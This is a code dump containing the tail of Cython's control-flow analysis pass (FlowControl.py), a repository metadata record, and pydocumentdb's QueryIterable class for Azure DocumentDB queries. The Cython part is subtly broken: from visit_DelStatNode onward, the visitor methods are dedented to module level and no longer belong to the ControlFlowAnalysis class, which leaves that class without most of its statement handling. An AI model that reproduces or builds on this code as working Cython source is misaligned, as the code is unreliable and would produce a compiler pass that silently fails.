                            label += '\n %s [reference %s]' % (stat.entry.name, stat.pos[1])
            if not label:
                label = 'empty'
            pid = ctx.nodeid(block)
            fp.write(' %s [label="%s"];\n' % (pid, ctx.escape(label)))
        # Emit edges after all node declarations.
        for block in self.flow.blocks:
            pid = ctx.nodeid(block)
            for child in block.children:
                fp.write(' %s -> %s;\n' % (pid, ctx.nodeid(child)))
        fp.write(' }\n')
class MessageCollection(object):
    """Collects error/warning messages, then reports them sorted by
    position so diagnostics come out in source order."""

    def __init__(self):
        self.messages = set()

    def error(self, pos, message):
        self.messages.add((pos, True, message))

    def warning(self, pos, message):
        self.messages.add((pos, False, message))

    def report(self):
        # Tuples sort as (pos, is_error, text): position order, warnings
        # before errors at the same position.
        for pos, is_error, message in sorted(self.messages):
            if is_error:
                error(pos, message)
            else:
                warning(pos, message, 2)
def check_definitions(flow, compiler_directives):
    """Run reaching-definitions on `flow`, attach cf_state / nullability
    hints to nodes, and emit uninitialised/unused diagnostics."""
    flow.initialize()
    flow.reaching_definitions()
    # Track down state
    assignments = set()
    # Node to entry map
    references = {}
    assmt_nodes = set()
    # Walk each block, threading the bit-vector state through its statements.
    for block in flow.blocks:
        i_state = block.i_input
        for stat in block.stats:
            i_assmts = flow.assmts[stat.entry]
            state = flow.map_one(i_state, stat.entry)
            if isinstance(stat, NameAssignment):
                stat.lhs.cf_state.update(state)
                assmt_nodes.add(stat.lhs)
                # Kill all previous assignments of this entry, then set
                # either the "uninitialised" bit (deletion) or this stat's.
                i_state = i_state & ~i_assmts.mask
                if stat.is_deletion:
                    i_state |= i_assmts.bit
                else:
                    i_state |= stat.bit
                assignments.add(stat)
                if stat.rhs is not fake_rhs_expr:
                    stat.entry.cf_assignments.append(stat)
            elif isinstance(stat, NameReference):
                references[stat.node] = stat.entry
                stat.entry.cf_references.append(stat)
                stat.node.cf_state.update(state)
                ## if not stat.node.allow_null:
                ## i_state &= ~i_assmts.bit
                ## # after successful read, the state is known to be initialised
                state.discard(Uninitialized)
                state.discard(Unknown)
                # Link each reaching assignment to this reference.
                for assmt in state:
                    assmt.refs.add(stat)
    # Check variable usage
    warn_maybe_uninitialized = compiler_directives['warn.maybe_uninitialized']
    warn_unused_result = compiler_directives['warn.unused_result']
    warn_unused = compiler_directives['warn.unused']
    warn_unused_arg = compiler_directives['warn.unused_arg']
    messages = MessageCollection()
    # assignment hints
    for node in assmt_nodes:
        if Uninitialized in node.cf_state:
            node.cf_maybe_null = True
            if len(node.cf_state) == 1:
                node.cf_is_null = True
            else:
                node.cf_is_null = False
        elif Unknown in node.cf_state:
            node.cf_maybe_null = True
        else:
            node.cf_is_null = False
            node.cf_maybe_null = False
    # Find uninitialized references and cf-hints
    for node, entry in references.items():
        if Uninitialized in node.cf_state:
            node.cf_maybe_null = True
            if not entry.from_closure and len(node.cf_state) == 1:
                node.cf_is_null = True
            if (node.allow_null or entry.from_closure
                    or entry.is_pyclass_attr or entry.type.is_error):
                pass # Can be uninitialized here
            elif node.cf_is_null:
                # Definitely-unbound read: error or warning depending on
                # the entry's type and the error_on_uninitialized options.
                if entry.error_on_uninitialized or (
                        Options.error_on_uninitialized and (
                        entry.type.is_pyobject or entry.type.is_unspecified)):
                    messages.error(
                        node.pos,
                        "local variable '%s' referenced before assignment"
                        % entry.name)
                else:
                    messages.warning(
                        node.pos,
                        "local variable '%s' referenced before assignment"
                        % entry.name)
            elif warn_maybe_uninitialized:
                messages.warning(
                    node.pos,
                    "local variable '%s' might be referenced before assignment"
                    % entry.name)
        elif Unknown in node.cf_state:
            # TODO: better cross-closure analysis to know when inner functions
            # are being called before a variable is being set, and when
            # a variable is known to be set before even defining the
            # inner function, etc.
            node.cf_maybe_null = True
        else:
            node.cf_is_null = False
            node.cf_maybe_null = False
    # Unused result
    for assmt in assignments:
        if (not assmt.refs and not assmt.entry.is_pyclass_attr
                and not assmt.entry.in_closure):
            if assmt.entry.cf_references and warn_unused_result:
                if assmt.is_arg:
                    messages.warning(assmt.pos, "Unused argument value '%s'" %
                                     assmt.entry.name)
                else:
                    messages.warning(assmt.pos, "Unused result in '%s'" %
                                     assmt.entry.name)
            assmt.lhs.cf_used = False
    # Unused entries
    for entry in flow.entries:
        if (not entry.cf_references
                and not entry.is_pyclass_attr):
            if entry.name != '_' and not entry.name.startswith('unused'):
                # '_' is often used for unused variables, e.g. in loops
                if entry.is_arg:
                    if warn_unused_arg:
                        messages.warning(entry.pos, "Unused argument '%s'" %
                                         entry.name)
                else:
                    if warn_unused:
                        messages.warning(entry.pos, "Unused entry '%s'" %
                                         entry.name)
                entry.cf_used = False
    messages.report()
    # Freeze each node's state set into a ControlFlowState with hints.
    for node in assmt_nodes:
        node.cf_state = ControlFlowState(node.cf_state)
    for node in references:
        node.cf_state = ControlFlowState(node.cf_state)
class AssignmentCollector(TreeVisitor):
    """Tree visitor that gathers (lhs, rhs) pairs from assignment nodes.

    Used by ControlFlowAnalysis.visit_ParallelAssignmentNode to flatten the
    assignments contained in a parallel-assignment statement.
    """

    def __init__(self):
        super(AssignmentCollector, self).__init__()
        self.assignments = []

    def visit_Node(self, node):
        # Generic fallback: recurse into children.  Fixed from the original
        # `def visit_Node(self)`, which dropped the dispatched node argument
        # and passed `self` to _visitchildren -- raising TypeError whenever
        # a non-assignment node was visited.
        self._visitchildren(node, None)

    def visit_SingleAssignmentNode(self, node):
        self.assignments.append((node.lhs, node.rhs))

    def visit_CascadedAssignmentNode(self, node):
        # a = b = rhs: one pair per target.
        for lhs in node.lhs_list:
            self.assignments.append((lhs, node.rhs))
class ControlFlowAnalysis(CythonTransform):
    def visit_ModuleNode(self, node):
        """Analyse the module body (and, via visitchildren, every function
        in it); optionally dump all flow graphs to a Graphviz DOT file."""
        self.gv_ctx = GVContext()
        self.constant_folder = ConstantFolding()
        # Set of NameNode reductions
        self.reductions = set()
        self.in_inplace_assignment = False
        self.env_stack = []
        self.env = node.scope
        self.stack = []
        self.flow = ControlFlow()
        self.visitchildren(node)
        check_definitions(self.flow, self.current_directives)
        dot_output = self.current_directives['control_flow.dot_output']
        if dot_output:
            annotate_defs = self.current_directives['control_flow.dot_annotate_defs']
            fp = open(dot_output, 'wt')
            try:
                self.gv_ctx.render(fp, 'module', annotate_defs=annotate_defs)
            finally:
                fp.close()
        return node
    def visit_FuncDefNode(self, node):
        """Build, check and render a separate CFG for one function body."""
        # Default values and decorators are evaluated in the OUTER scope.
        for arg in node.args:
            if arg.default:
                self.visitchildren(arg)
        self.visitchildren(node, ('decorators',))
        # Push the enclosing scope/flow; the function gets its own graph.
        self.env_stack.append(self.env)
        self.env = node.local_scope
        self.stack.append(self.flow)
        self.flow = ControlFlow()
        # Collect all entries
        for entry in node.local_scope.entries.values():
            if self.flow.is_tracked(entry):
                self.flow.entries.add(entry)
        self.mark_position(node)
        # Function body block
        self.flow.nextblock()
        for arg in node.args:
            self._visit(arg)
        # *args / **kwargs bind a tuple / dict that is never None.
        if node.star_arg:
            self.flow.mark_argument(node.star_arg,
                                    TypedExprNode(Builtin.tuple_type,
                                                  may_be_none=False),
                                    node.star_arg.entry)
        if node.starstar_arg:
            self.flow.mark_argument(node.starstar_arg,
                                    TypedExprNode(Builtin.dict_type,
                                                  may_be_none=False),
                                    node.starstar_arg.entry)
        self._visit(node.body)
        # Workaround for generators
        if node.is_generator:
            self._visit(node.gbody.body)
        # Exit point
        if self.flow.block:
            self.flow.block.add_child(self.flow.exit_point)
        # Cleanup graph
        self.flow.normalize()
        check_definitions(self.flow, self.current_directives)
        self.flow.blocks.add(self.flow.entry_point)
        self.gv_ctx.add(GV(node.local_scope.name, self.flow))
        # Restore the enclosing flow graph and scope.
        self.flow = self.stack.pop()
        self.env = self.env_stack.pop()
        return node
    def visit_DefNode(self, node):
        # Python-level def: flag the node as used (presumably to suppress
        # unused warnings elsewhere -- confirm) and analyse like a function.
        node.used = True
        return self.visit_FuncDefNode(node)
    def visit_GeneratorBodyDefNode(self, node):
        # Generator bodies are analysed inside visit_FuncDefNode (node.gbody).
        return node
    def visit_CTypeDefNode(self, node):
        # ctypedefs introduce no control flow.
        return node
    def mark_assignment(self, lhs, rhs=None):
        """Record an assignment to `lhs` (a name, unpacking target, or
        arbitrary expression) in the current flow graph."""
        if not self.flow.block:
            # Dead code after a terminator: nothing to record.
            return
        if self.flow.exceptions:
            # Inside a try block control may jump to the handler at any
            # point, so split the block around the assignment.
            exc_descr = self.flow.exceptions[-1]
            self.flow.block.add_child(exc_descr.entry_point)
            self.flow.nextblock()
        if not rhs:
            rhs = object_expr
        if lhs.is_name:
            if lhs.entry is not None:
                entry = lhs.entry
            else:
                entry = self.env.lookup(lhs.name)
            if entry is None: # TODO: This shouldn't happen...
                return
            self.flow.mark_assignment(lhs, rhs, entry)
        elif lhs.is_sequence_constructor:
            # Unpacking: mark each target, with a per-item rhs if inferable.
            for i, arg in enumerate(lhs.args):
                if not rhs or arg.is_starred:
                    item_node = None
                else:
                    item_node = rhs.inferable_item_node(i)
                self.mark_assignment(arg, item_node)
        else:
            self._visit(lhs)
        if self.flow.exceptions:
            exc_descr = self.flow.exceptions[-1]
            self.flow.block.add_child(exc_descr.entry_point)
            self.flow.nextblock()
    def mark_position(self, node):
        """Mark position if DOT output is enabled."""
        if self.current_directives['control_flow.dot_output']:
            self.flow.mark_position(node)
    def visit_FromImportStatNode(self, node):
        # Each imported name is an assignment to its target ('*' excepted).
        for name, target in node.items:
            if name != "*":
                self.mark_assignment(target)
        self.visitchildren(node)
        return node
    def visit_AssignmentNode(self, node):
        # Abstract base: every concrete assignment node has its own visitor.
        raise InternalError("Unhandled assignment node")
    def visit_SingleAssignmentNode(self, node):
        self._visit(node.rhs)
        self.mark_assignment(node.lhs, node.rhs)
        return node
    def visit_CascadedAssignmentNode(self, node):
        # a = b = rhs: evaluate rhs once, assign to every target.
        self._visit(node.rhs)
        for lhs in node.lhs_list:
            self.mark_assignment(lhs, node.rhs)
        return node
    def visit_ParallelAssignmentNode(self, node):
        # Visit all right-hand sides before marking any assignment,
        # matching the semantics of e.g. 'a, b = b, a'.
        collector = AssignmentCollector()
        collector.visitchildren(node)
        for lhs, rhs in collector.assignments:
            self._visit(rhs)
        for lhs, rhs in collector.assignments:
            self.mark_assignment(lhs, rhs)
        return node
    def visit_InPlaceAssignmentNode(self, node):
        # 'a += b' both reads and writes a: treat it as 'a = a + b'.
        self.in_inplace_assignment = True
        self.visitchildren(node)
        self.in_inplace_assignment = False
        self.mark_assignment(node.lhs, self.constant_folder(node.create_binop_node()))
        return node
def visit_DelStatNode(self, node):
    # 'del' of a plain name is recorded as a deletion event; deleting
    # a closure variable is a compile error.
    for arg in node.args:
        if arg.is_name:
            entry = arg.entry or self.env.lookup(arg.name)
            if entry.in_closure or entry.from_closure:
                error(arg.pos,
                      "can not delete variable '%s' "
                      "referenced in nested scope" % entry.name)
            if not node.ignore_nonexisting:
                self._visit(arg)  # mark reference
            self.flow.mark_deletion(arg, entry)
        else:
            # Non-name targets (subscripts, attributes): just visit.
            self._visit(arg)
    return node

def visit_CArgDeclNode(self, node):
    # Function argument: assigned on entry with its declared type;
    # arguments declared 'not None' can never be None.
    entry = self.env.lookup(node.name)
    if entry:
        may_be_none = not node.not_none
        self.flow.mark_argument(
            node, TypedExprNode(entry.type, may_be_none), entry)
    return node

def visit_NameNode(self, node):
    # A name use is a reference event (drives uninitialized-variable
    # and unused-variable diagnostics).
    if self.flow.block:
        entry = node.entry or self.env.lookup(node.name)
        if entry:
            self.flow.mark_reference(node, entry)

            # Reduction variables may only be updated in place.
            if entry in self.reductions and not self.in_inplace_assignment:
                error(node.pos,
                      "Cannot read reduction variable in loop body")
    return node

def visit_StatListNode(self, node):
    if self.flow.block:
        for stat in node.stats:
            self._visit(stat)
            if not self.flow.block:
                # Control cannot continue past this statement (return,
                # raise, break, ...): the rest of the list is dead code.
                stat.is_terminator = True
                break
    return node

def visit_Node(self, node):
    # Default visitor: no control-flow effect; recurse and record the
    # source position for DOT output.
    self.visitchildren(node)
    self.mark_position(node)
    return node
def visit_IfStatNode(self, node):
    """Build CFG edges for an if/elif/else chain."""
    next_block = self.flow.newblock()  # join point after the statement
    parent = self.flow.block
    # If clauses
    for clause in node.if_clauses:
        # Each condition is evaluated in a block chained off the
        # previous condition's block.
        parent = self.flow.nextblock(parent)
        self._visit(clause.condition)
        self.flow.nextblock()
        self._visit(clause.body)
        if self.flow.block:
            self.flow.block.add_child(next_block)
    # Else clause
    if node.else_clause:
        self.flow.nextblock(parent=parent)
        self._visit(node.else_clause)
        if self.flow.block:
            self.flow.block.add_child(next_block)
    else:
        # No else: the final condition may fall through directly.
        parent.add_child(next_block)

    if next_block.parents:
        self.flow.block = next_block
    else:
        # Every branch terminated: code after the 'if' is unreachable.
        self.flow.block = None
    return node

def visit_WhileStatNode(self, node):
    """Build CFG edges for a while loop (condition, body, else)."""
    condition_block = self.flow.nextblock()
    next_block = self.flow.newblock()
    # Condition block
    self.flow.loops.append(LoopDescr(next_block, condition_block))
    if node.condition:
        self._visit(node.condition)
    # Body block
    self.flow.nextblock()
    self._visit(node.body)
    self.flow.loops.pop()
    # Loop it
    if self.flow.block:
        # Falling off the body loops back to the condition; the loop
        # may also be left from there.
        self.flow.block.add_child(condition_block)
        self.flow.block.add_child(next_block)
    # Else clause
    if node.else_clause:
        self.flow.nextblock(parent=condition_block)
        self._visit(node.else_clause)
        if self.flow.block:
            self.flow.block.add_child(next_block)
    else:
        condition_block.add_child(next_block)

    if next_block.parents:
        self.flow.block = next_block
    else:
        self.flow.block = None
    return node
def mark_forloop_target(self, node):
    """Record assignments to the for-in loop target, special-casing
    ``reversed()``, ``enumerate()`` and ``range()``/``xrange()`` over
    builtins so the target's type can be inferred more precisely."""
    # TODO: Remove redundancy with range optimization...
    is_special = False
    sequence = node.iterator.sequence
    target = node.target
    if isinstance(sequence, ExprNodes.SimpleCallNode):
        function = sequence.function
        if sequence.self is None and function.is_name:
            entry = self.env.lookup(function.name)
            if not entry or entry.is_builtin:
                if function.name == 'reversed' and len(sequence.args) == 1:
                    # reversed(seq): analyse as if iterating 'seq'.
                    sequence = sequence.args[0]
                elif function.name == 'enumerate' and len(sequence.args) == 1:
                    if target.is_sequence_constructor and len(target.args) == 2:
                        iterator = sequence.args[0]
                        if iterator.is_name:
                            iterator_type = iterator.infer_type(self.env)
                            if iterator_type.is_builtin_type:
                                # assume that builtin types have a length within Py_ssize_t
                                self.mark_assignment(
                                    target.args[0],
                                    ExprNodes.IntNode(target.pos, value='PY_SSIZE_T_MAX',
                                                      type=PyrexTypes.c_py_ssize_t_type))
                                # Continue analysing the value part of the
                                # (index, value) target against the wrapped
                                # sequence.
                                target = target.args[1]
                                sequence = sequence.args[0]
    if isinstance(sequence, ExprNodes.SimpleCallNode):
        function = sequence.function
        if sequence.self is None and function.is_name:
            entry = self.env.lookup(function.name)
            if not entry or entry.is_builtin:
                if function.name in ('range', 'xrange'):
                    is_special = True
                    # The target takes the start/stop bounds and, with a
                    # step, 'start + step' as representative values.
                    for arg in sequence.args[:2]:
                        self.mark_assignment(target, arg)
                    if len(sequence.args) > 2:
                        self.mark_assignment(target, self.constant_folder(
                            ExprNodes.binop_node(node.pos,
                                                 '+',
                                                 sequence.args[0],
                                                 sequence.args[2])))

    if not is_special:
        # A for-loop basically translates to subsequent calls to
        # __getitem__(), so using an IndexNode here allows us to
        # naturally infer the base type of pointers, C arrays,
        # Python strings, etc., while correctly falling back to an
        # object type when the base type cannot be handled.
        self.mark_assignment(target, node.item)
def visit_AsyncForStatNode(self, node):
    # 'async for' shares the CFG shape of a plain for-in loop.
    return self.visit_ForInStatNode(node)

def visit_ForInStatNode(self, node):
    """Build CFG edges for for-in, async-for and parallel (prange)
    loops; the node type selects how the target assignment is modelled."""
    condition_block = self.flow.nextblock()
    next_block = self.flow.newblock()
    # Condition with iterator
    self.flow.loops.append(LoopDescr(next_block, condition_block))
    self._visit(node.iterator)
    # Target assignment
    self.flow.nextblock()

    if isinstance(node, Nodes.ForInStatNode):
        self.mark_forloop_target(node)
    elif isinstance(node, Nodes.AsyncForStatNode):
        # not entirely correct, but good enough for now
        self.mark_assignment(node.target, node.item)
    else: # Parallel
        self.mark_assignment(node.target)

    # Body block
    if isinstance(node, Nodes.ParallelRangeNode):
        # In case of an invalid
        self._delete_privates(node, exclude=node.target.entry)

    self.flow.nextblock()
    self._visit(node.body)
    self.flow.loops.pop()

    # Loop it
    if self.flow.block:
        self.flow.block.add_child(condition_block)
    # Else clause
    if node.else_clause:
        self.flow.nextblock(parent=condition_block)
        self._visit(node.else_clause)
        if self.flow.block:
            self.flow.block.add_child(next_block)
    else:
        condition_block.add_child(next_block)

    if next_block.parents:
        self.flow.block = next_block
    else:
        self.flow.block = None
    return node

def _delete_privates(self, node, exclude=None):
    # Privates of a parallel block are unset at its boundaries; model
    # that as a deletion of every assigned private (except *exclude*).
    for private_node in node.assigned_nodes:
        if not exclude or private_node.entry is not exclude:
            self.flow.mark_deletion(private_node, private_node.entry)

def visit_ParallelRangeNode(self, node):
    reductions = self.reductions
    # if node.target is None or not a NameNode, an error will have
    # been previously issued
    if hasattr(node.target, 'entry'):
        # Collect reduction variables for this prange into a copy of
        # the current reduction set, then analyse it as a for-in loop.
        self.reductions = set(reductions)

        for private_node in node.assigned_nodes:
            private_node.entry.error_on_uninitialized = True
            pos, reduction = node.assignments[private_node.entry]
            if reduction:
                self.reductions.add(private_node.entry)

        node = self.visit_ForInStatNode(node)

    self.reductions = reductions
    return node

def visit_ParallelWithBlockNode(self, node):
    for private_node in node.assigned_nodes:
        private_node.entry.error_on_uninitialized = True

    # Privates are unset both on entry to and exit from the block.
    self._delete_privates(node)
    self.visitchildren(node)
    self._delete_privates(node)

    return node
def visit_ForFromStatNode(self, node):
    """Build CFG edges for a C-style 'for target from bound1 <= target
    < bound2 [by step]' loop."""
    condition_block = self.flow.nextblock()
    next_block = self.flow.newblock()
    # Condition with iterator
    self.flow.loops.append(LoopDescr(next_block, condition_block))
    self._visit(node.bound1)
    self._visit(node.bound2)
    if node.step is not None:
        self._visit(node.step)
    # Target assignment
    self.flow.nextblock()
    self.mark_assignment(node.target, node.bound1)
    if node.step is not None:
        # Later iterations: approximate all subsequent values with a
        # single 'bound1 + step' assignment.
        self.mark_assignment(node.target, self.constant_folder(
            ExprNodes.binop_node(node.pos, '+', node.bound1, node.step)))
    # Body block
    self.flow.nextblock()
    self._visit(node.body)
    self.flow.loops.pop()
    # Loop it
    if self.flow.block:
        self.flow.block.add_child(condition_block)
    # Else clause
    if node.else_clause:
        self.flow.nextblock(parent=condition_block)
        self._visit(node.else_clause)
        if self.flow.block:
            self.flow.block.add_child(next_block)
    else:
        condition_block.add_child(next_block)

    if next_block.parents:
        self.flow.block = next_block
    else:
        self.flow.block = None
    return node

def visit_LoopNode(self, node):
    # Concrete loop node types are handled by the visitors above;
    # a generic LoopNode reaching this point is a compiler bug.
    raise InternalError("Generic loops are not supported")
def visit_WithTargetAssignmentStatNode(self, node):
    """The with-target is bound to the result of the context manager's
    ``__enter__`` call; record that as an assignment."""
    enter_result = node.with_node.enter_call
    self.mark_assignment(node.lhs, enter_result)
    return node

def visit_WithStatNode(self, node):
    """Walk a ``with`` statement: the manager expression, the implicit
    ``__enter__`` call, then the body."""
    for child in (node.manager, node.enter_call, node.body):
        self._visit(child)
    return node
def visit_TryExceptStatNode(self, node):
    """Build CFG edges for try/except/else: the body may jump to the
    handlers' entry point at any raising statement; each handler either
    matches or falls through to the next one."""
    # After exception handling
    next_block = self.flow.newblock()
    # Body block
    self.flow.newblock()
    # Exception entry point
    entry_point = self.flow.newblock()
    self.flow.exceptions.append(ExceptionDescr(entry_point))
    self.flow.nextblock()
    ## XXX: links to exception handling point should be added by
    ## XXX: children nodes
    self.flow.block.add_child(entry_point)
    self.flow.nextblock()
    self._visit(node.body)
    self.flow.exceptions.pop()

    # After exception
    if self.flow.block:
        if node.else_clause:
            self.flow.nextblock()
            self._visit(node.else_clause)
        if self.flow.block:
            self.flow.block.add_child(next_block)

    for clause in node.except_clauses:
        self.flow.block = entry_point
        if clause.pattern:
            for pattern in clause.pattern:
                self._visit(pattern)
        else:
            # TODO: handle * pattern
            pass
        # A non-matching clause falls through to the next handler (or
        # out of the statement entirely).
        entry_point = self.flow.newblock(parent=self.flow.block)
        self.flow.nextblock()
        if clause.target:
            self.mark_assignment(clause.target)
        self._visit(clause.body)
        if self.flow.block:
            self.flow.block.add_child(next_block)

    if self.flow.exceptions:
        # Unmatched exceptions propagate to the enclosing handler.
        entry_point.add_child(self.flow.exceptions[-1].entry_point)

    if next_block.parents:
        self.flow.block = next_block
    else:
        self.flow.block = None
    return node

def visit_TryFinallyStatNode(self, node):
    """Build CFG edges for try/finally.  The finally clause is entered
    both on normal exit and via the exception entry point; break,
    continue and return inside the body are routed through it (see the
    ExceptionDescr registered on the loop/exception stacks)."""
    body_block = self.flow.nextblock()

    # Exception entry point
    entry_point = self.flow.newblock()
    self.flow.block = entry_point
    self._visit(node.finally_except_clause)

    if self.flow.block and self.flow.exceptions:
        self.flow.block.add_child(self.flow.exceptions[-1].entry_point)

    # Normal execution
    finally_enter = self.flow.newblock()
    self.flow.block = finally_enter
    self._visit(node.finally_clause)
    finally_exit = self.flow.block

    descr = ExceptionDescr(entry_point, finally_enter, finally_exit)
    self.flow.exceptions.append(descr)
    if self.flow.loops:
        # break/continue inside the body must run the finally clause.
        self.flow.loops[-1].exceptions.append(descr)
    self.flow.block = body_block
    ## XXX: Is it still required
    body_block.add_child(entry_point)
    self.flow.nextblock()
    self._visit(node.body)
    self.flow.exceptions.pop()
    if self.flow.loops:
        self.flow.loops[-1].exceptions.pop()

    if self.flow.block:
        self.flow.block.add_child(finally_enter)
        if finally_exit:
            self.flow.block = self.flow.nextblock(parent=finally_exit)
        else:
            self.flow.block = None
    return node
def visit_RaiseStatNode(self, node):
    self.mark_position(node)
    self.visitchildren(node)
    if self.flow.exceptions:
        self.flow.block.add_child(self.flow.exceptions[-1].entry_point)
    # Control never continues past a raise.
    self.flow.block = None
    return node

def visit_ReraiseStatNode(self, node):
    self.mark_position(node)
    if self.flow.exceptions:
        self.flow.block.add_child(self.flow.exceptions[-1].entry_point)
    self.flow.block = None
    return node

def visit_ReturnStatNode(self, node):
    self.mark_position(node)
    self.visitchildren(node)

    # Route through the innermost pending finally clause, if any,
    # before reaching the function's exit point.
    for exception in self.flow.exceptions[::-1]:
        if exception.finally_enter:
            self.flow.block.add_child(exception.finally_enter)
            if exception.finally_exit:
                exception.finally_exit.add_child(self.flow.exit_point)
            break
    else:
        if self.flow.block:
            self.flow.block.add_child(self.flow.exit_point)
    self.flow.block = None
    return node

def visit_BreakStatNode(self, node):
    if not self.flow.loops:
        #error(node.pos, "break statement not inside loop")
        return node
    loop = self.flow.loops[-1]
    self.mark_position(node)
    # Route through the loop's pending finally clauses before jumping
    # to the block after the loop.
    for exception in loop.exceptions[::-1]:
        if exception.finally_enter:
            self.flow.block.add_child(exception.finally_enter)
            if exception.finally_exit:
                exception.finally_exit.add_child(loop.next_block)
            break
    else:
        self.flow.block.add_child(loop.next_block)
    self.flow.block = None
    return node

def visit_ContinueStatNode(self, node):
    if not self.flow.loops:
        #error(node.pos, "continue statement not inside loop")
        return node
    loop = self.flow.loops[-1]
    self.mark_position(node)
    # Same finally-clause routing as break, but the jump target is the
    # loop's condition block.
    for exception in loop.exceptions[::-1]:
        if exception.finally_enter:
            self.flow.block.add_child(exception.finally_enter)
            if exception.finally_exit:
                exception.finally_exit.add_child(loop.loop_block)
            break
    else:
        self.flow.block.add_child(loop.loop_block)
    self.flow.block = None
    return node
def visit_ComprehensionNode(self, node):
    """Analyse a comprehension inside its own expression scope, when it
    has one.  Only the loop is visited; the append node is deliberately
    skipped."""
    scope = node.expr_scope
    if scope:
        self.env_stack.append(self.env)
        self.env = scope
    self._visit(node.loop)
    if scope:
        self.env = self.env_stack.pop()
    return node

def visit_ScopedExprNode(self, node):
    """Visit the children of a scoped expression, swapping in its
    expression scope for the duration when one is present."""
    scope = node.expr_scope
    if scope:
        self.env_stack.append(self.env)
        self.env = scope
    self.visitchildren(node)
    if scope:
        self.env = self.env_stack.pop()
    return node
def visit_PyClassDefNode(self, node):
    # The class-creation parts (dict, metaclass, keyword args, bases,
    # resulting class object) are evaluated in the enclosing scope...
    self.visitchildren(node, ('dict', 'metaclass',
                              'mkw', 'bases', 'class_result'))
    self.flow.mark_assignment(node.target, node.classobj,
                              self.env.lookup(node.name))
    # ...while the class body is analysed in the class scope.
    self.env_stack.append(self.env)
    self.env = node.scope
    self.flow.nextblock()
    self.visitchildren(node, ('body',))
    self.flow.nextblock()
    self.env = self.env_stack.pop()
    return node

def visit_AmpersandNode(self, node):
    # Taking the address of a variable: the value may later be set
    # through the pointer, so treat it as assigned.
    if node.operand.is_name:
        # Fake assignment to silence warning
        self.mark_assignment(node.operand, fake_rhs_expr)
    self.visitchildren(node)
    return node
| {
"content_hash": "024fa5833f6f742977f109e3a852dde3",
"timestamp": "",
"source": "github",
"line_count": 1321,
"max_line_length": 107,
"avg_line_length": 34.68054504163513,
"alnum_prop": 0.5594481915613472,
"repo_name": "c-blake/cython",
"id": "b859e1bc06e9a1089e1391c0778412abb24092dc",
"size": "45813",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "Cython/Compiler/FlowControl.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1429"
},
{
"name": "C",
"bytes": "476635"
},
{
"name": "C++",
"bytes": "23080"
},
{
"name": "CSS",
"bytes": "11543"
},
{
"name": "Emacs Lisp",
"bytes": "11931"
},
{
"name": "HTML",
"bytes": "112723"
},
{
"name": "JavaScript",
"bytes": "15703"
},
{
"name": "Makefile",
"bytes": "5078"
},
{
"name": "PowerShell",
"bytes": "3803"
},
{
"name": "Python",
"bytes": "5421452"
},
{
"name": "Smalltalk",
"bytes": "618"
}
],
"symlink_target": ""
} |
#The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""Iterable query results in the Azure DocumentDB database service.
"""
from pydocumentdb.execution_context import execution_dispatcher
from pydocumentdb.execution_context import base_execution_context
class QueryIterable(object):
    """Represents an iterable object of the query results.

    QueryIterable is a wrapper for query execution context.
    """

    def __init__(self, client, query, options, fetch_function, collection_link = None):
        """
        Instantiates a QueryIterable for non-client side partitioning queries.
        _ProxyQueryExecutionContext will be used as the internal query execution context

        :Parameters:
            - client (DocumentClient), instance of document client
            - query (dict) or (str), query
            - options (dict), the request options for the request.
            - fetch_function: method, fetch function
            - collection_link (str): if this is a Document query/feed collection_link is required

        Example of `fetch_function`:

        >>> def result_fn(result):
        >>>     return result['Databases']

        """
        self._client = client
        self.retry_options = client.connection_policy.RetryOptions;
        self._query = query
        self._options = options
        self._fetch_function = fetch_function
        self._collection_link = collection_link
        # Created lazily by fetch_next_block(); __iter__ builds its own
        # per-iterator execution context instead of sharing this one.
        self._ex_context = None

    @classmethod
    def PartitioningQueryIterable(cls, client, query, options, database_link, partition_key):
        """
        Represents a client side partitioning query iterable.

        This constructor instantiates a QueryIterable for
        client side partitioning queries, and sets _MultiCollectionQueryExecutionContext
        as the internal execution context.

        :Parameters:
            - `client`: DocumentClient, instance of document client
            - `query`: str or dict
            - `options`: dict, the request options for the request.
            - `database_link`: str, database self link or ID based link
            - `partition_key`: str, partition key for the query
        """
        # This will call the base constructor(__init__ method above)
        self = cls(client, query, options, None, None)
        # The presence of _database_link is what switches
        # _create_execution_context to the client-side-partitioning path.
        self._database_link = database_link
        self._partition_key = partition_key

        return self

    def _create_execution_context(self):
        """instantiates the internal query execution context based.
        """
        if hasattr(self, '_database_link'):
            # client side partitioning query
            return base_execution_context._MultiCollectionQueryExecutionContext(self._client, self._options, self._database_link, self._query, self._partition_key)
        else:
            # Non-partitioning query: delegate to the proxy execution
            # context.
            return execution_dispatcher._ProxyQueryExecutionContext(self._client, self._collection_link, self._query, self._options, self._fetch_function)

    def __iter__(self):
        """Makes this class iterable.
        """
        return self.Iterator(self)

    class Iterator(object):
        def __init__(self, iterable):
            self._iterable = iterable
            self._finished = False
            # Each iterator gets a fresh execution context so that
            # iterating the QueryIterable again restarts the query.
            self._ex_context = iterable._create_execution_context()

        def __iter__(self):
            # Always returns self
            return self

        def __next__(self):
            return next(self._ex_context)

        # Python 2 compatibility alias for __next__.
        def next(self):
            return self.__next__()

    def fetch_next_block(self):
        """Returns a block of results with respecting retry policy.

        This method only exists for backward compatibility reasons. (Because QueryIterable
        has exposed fetch_next_block api).

        :Returns:
            list. List of results.
        """
        if self._ex_context is None:
            # initiates execution context for the first time
            self._ex_context = self._create_execution_context()

        return self._ex_context.fetch_next_block()
| {
